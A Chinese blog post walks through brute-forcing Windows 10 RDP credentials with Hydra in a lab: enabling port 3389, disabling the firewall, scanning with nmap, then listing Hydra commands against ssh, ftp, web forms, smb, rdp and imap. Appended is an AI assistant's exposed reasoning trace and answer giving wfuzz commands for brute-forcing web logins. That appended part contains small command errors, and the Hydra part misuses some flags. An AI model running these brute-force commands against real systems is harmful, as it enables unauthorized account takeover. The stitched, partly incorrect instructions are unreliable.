hydra暴力破解win10用户名和密码

本文详细介绍如何使用Hydra工具进行Windows 10的暴力破解,涉及开启3389端口、关闭防火墙、nmap扫描、以及Hydra命令参数和实战案例,确保了安全性和渗透测试的步骤。

hydra暴力破解win10用户名和密码


准备工作:win10计算机开启3389端口和关闭防火墙

  1. 开启3389端口

3389端口:Windows 10远程桌面的服务端口,可以通过这个端口,用"远程桌面"等连接工具来连接到远程的服务器。

在桌面上右击“我的电脑”,选择“属性”,点击左边“远程设置”,选择“允许连接到此计算机”。
在这里插入图片描述


  1. 此外,为了让扫描更加顺利,我们还需要关闭win10计算机的防火墙。当然我们也可以借助nmap来穿透防火墙进行扫描,这一点以后会演示给大家。
    “win+R”并输入命令:“cmd”打开win10计算机的终端,并输入命令"firewall.cpl"来打开防火墙的设置。
    在显示的页面中,在左侧选择“开启或关闭windows Defender 防火墙”,最后将“专用网络”与“公用网络”的防火墙,均关闭。
    在这里插入图片描述
    另外,我们还需要保证kali虚拟机与win10系统的网络是互通的。
    例如:
    kali的ip地址:192.168.1.130,win10的ip地址为192.168.1.138。
    这样,在kali的终端输入:ping 192.168.1.138,在win10终端输入:ping 192.168.1.130,就可以看到kali与win10之间的网络是互通的。
    在这里插入图片描述
    在这里插入图片描述

windows计算机中查看ip地址的命令:ipconfig。
kali虚拟机中查看ip地址的命令:ifconfig。
并且,ping命令在windows计算机中发送3次,会自动停止。而kali虚拟机中,则会一直向被测试的win10计算机发送测试数据。我们要想终止,就事用命令:ctrl+C。
在实际操作中,我发现:kali虚拟机要想ping通 win10计算机,必须先将win10的防火墙关闭。


  1. 使用namp 批量扫描 ,哪些开启3389端口。

在kali虚拟机中的终端输入命令:nmap -p 3389 192.168.1.10-255 。
在这里插入图片描述


hydra(九头蛇)

hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。
官 网:http://www.thc.org/thc-hydra。

  1. 参数说明
 
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] 
 
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] 
 
-R 继续从上一次进度接着破解。 
 
-S 采用SSL链接。 
 
-s PORT 可通过这个参数指定非默认端口。 
 
-l LOGIN 指定破解的用户,对特定用户破解。 
 
-L FILE 指定用户名字典。 
 
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。 
 
-P FILE 大写,指定密码字典。 
 
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。 
 
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。 
 
-M FILE 指定目标列表文件一行一条。 
 
-o FILE 指定结果输出文件。 
 
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。 
 
-t TASKS 同时运行的线程数,默认为16-w TIME 设置最大超时的时间,单位秒,默认是30s。 
 
-v / -V 显示详细过程。 
 
server 目标ip 
 
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt 
http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc 
ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec 
rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere 
teamspeak sip vmauthd firebird ncp afp等等。 
 
OPT 可选项

  1. 攻击案例
1、破解ssh: 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh 
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh 
 
2、破解ftp: 
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV 
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV 
 
3、get方式提交,破解web登录: 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
 
4、post方式提交,破解web登录: 
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" 
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>" 
(参数说明:-t同时线程数3-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。) 

5、破解https: 
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 
 
6、破解teamspeak: 
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak 
 
7、破解cisco: 
hydra -P pass.txt 10.36.16.18 cisco 
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 
 
8、破解smb: 
hydra -l administrator -P pass.txt 10.36.16.18 smb 
  
9、破解pop3: 
hydra -l muts -P pass.txt my.pop3.mail pop3 
 
10、破解rdp: 
hydra ip rdp -l administrator -P pass.txt -V 
 
11、破解http-proxy: 
hydra -l admin -P pass.txt http-proxy://10.36.16.18 
 
12、破解imap: 
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN 
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

  1. 详细案例

RDP 是 Remote Display Protocal(远程显示协议)的缩写,是微软公司基于多用户 Windows 系统开发的远程连接协议。
在这里插入图片描述


  1. 详细案例

hydra暴力破解win10用户名和密码

B站演示连接:https://www.bilibili.com/video/BV1bh411y7i5


  1. 为了大家的计算机网络安全,一定要打开防火墙和win10自带的安全软件Defender。
<think>嗯,用户想用wfuzz进行后台用户名密码的爆破测试,需要示例教程。首先,我得确认wfuzz的基本用法。wfuzz是一个web应用模糊测试工具,常用于目录参数爆破。用户可能对它的具体命令不太熟悉,需要给出具体的命令示例。 接下来,用户需要爆破用户名密码,这通常涉及到POST请求,表单参数。所以示例中应该包含POST方法、指定参数,并使用FUZZ关键字。可能需要使用-z参数指定字典文件,或者用多个-z处理不同的字段。 然后,要考虑是否需要处理会话,比如cookies或者session,有些登录页面可能需要先获取一个有效的会话ID。这时候可能需要结合其他工具,比如curl来获取cookie,再传递给wfuzz。例如,先用curl登录获取cookie,再用wfuzz带上该cookie进行爆破。 另外,过滤结果也很重要。用户可能需要根据响应的大小、行数或状态码来过滤无效的尝试。比如,使用--filter "code != 200"来排除错误响应,或者根据响应长度不同找到成功的组合。 用户还可能关心如何同时爆破用户名密码,这时候需要用到多个模糊点,比如USERPASS占位符,并使用-z file,users.txt-z file,passwords.txt来分别指定字典。同时,需要注意wfuzz的排列组合方式,可能需要使用所有可能的组合,这会增加测试次数,所以提醒用户控制测试规模。 还有,用户可能不知道如何查看结果,需要指出如何解释wfuzz的输出,比如HTTP状态码、响应长度等,以及如何识别成功的登录尝试。例如,成功的登录可能返回302重定向,而失败则是200,或者响应长度不同。 最后,要提醒用户法律问题,未经授权的测试是非法的,确保他们在合法范围内使用。同时,建议他们结合其他安全措施,如验证码或登录限制,来增强防护,引用之前的Hydra例子,说明限制尝试次数的重要性。 总结步骤:安装wfuzz,基本命令结构,处理POST请求,多个参数爆破,会话处理,结果过滤,示例命令,注意事项。这样用户能一步步跟着操作,同时了解相关风险优化方法。</think>### WFuzz 爆破后台用户名密码教程 #### 1. 基本命令结构 WFuzz 通过模糊测试参数爆破用户名密码,基本语法为: ```bash wfuzz -z <字典类型>,<字典路径> -d "参数名=FUZZ" -u <目标URL> [过滤条件] ``` - `-z`:指定字典来源(如文件、列表等) - `-d`:POST 请求参数 - `-u`:目标登录接口地址 #### 2. 单参数爆破示例 **爆破用户名(已知密码)**: ```bash wfuzz -z file,users.txt -d "username=FUZZ&password=test123" -u http://example.com/login ``` **爆破密码(已知用户名)**: ```bash wfuzz -z file,passwords.txt -d "username=admin&password=FUZZ" -u http://example.com/login ``` #### 3. 双参数同时爆破 使用两个 `-z` 参数分别定义用户名密码占位符: ```bash wfuzz -z file,users.txt -z file,passwords.txt -d "username=FUZZ&password=FUZ2Z" -u http://example.com/login ``` #### 4. 结果过滤 通过响应特征过滤无效结果: ```bash wfuzz --filter "code != 200" -z file,passwords.txt -d "username=admin&password=FUZZ" -u http://example.com/login ``` #### 5. 会话保持(Cookie/Session) 若需维持会话状态,先获取 Cookie 再注入: ```bash # 获取初始 Cookie curl -I http://example.com/login # 注入 Cookie 爆破 wfuzz -z file,passwords.txt -H "Cookie: PHPSESSID=abc123" -d "username=admin&password=FUZZ" -u http://example.com/login ``` #### 6. 完整示例(带过滤条件) ```bash wfuzz -z file,users.txt -z file,passwords.txt \ -d "username=FUZZ&password=FUZ2Z" \ -u http://example.com/login \ --filter "h=200 and chars>1000" ``` - `h=200`:过滤 HTTP 200 状态码 - `chars>1000`:筛选响应长度超过 1000 字符的结果 #### 注意事项 1. **合法性**:仅对授权目标测试,避免触犯法律[^1] 2. **字典质量**:使用常见弱口令字典(如 `rockyou.txt`) 3. **速率控制**:添加 `-t 10` 限制并发线程数 4. **协议适配**:HTTPS 需添加 `-k` 参数绕过证书验证
评论 5
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值